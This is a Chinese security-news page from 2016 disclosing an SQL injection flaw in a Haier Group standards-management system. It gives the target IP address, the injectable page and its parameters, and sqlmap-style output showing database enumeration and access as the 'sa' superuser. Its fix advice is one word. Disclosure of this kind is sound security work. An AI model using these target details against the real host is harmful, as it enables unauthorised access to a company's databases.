频道栏目
首页 > 安全 > 企业安全 > 正文

海尔集团标准信息管理系统存在SQL注入漏洞(SA权限)

2016-07-04 09:12:30           
收藏   我要投稿

海尔集团标准信息管理系统存在SQL注入漏洞(SA权限)

1 漏洞网站http://27.223.70.11/2 注入地址http://27.223.70.11/reg_success.asp3 注入参数bumen=整体信息&name=admin10&userid=admin10&Submit2=admin10&Submit=admin10&phone=13900001111&pwd=Admin123
&leibie=0&password=Admin!@999&email=admin123@admin.com

available databases [6]:

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] tempdb

[18:33:15] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2000

[18:33:15] [INFO] fetching current user

[18:33:15] [INFO] retrieved: sa

current user: 'sa'

修复方案:

过滤

上一篇:广州长城宽带内网网段不隔离=控制机房UPS电源+监控设备弱口令
下一篇:新浪微米某系统弱口令getshell/root权限/内网环境
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站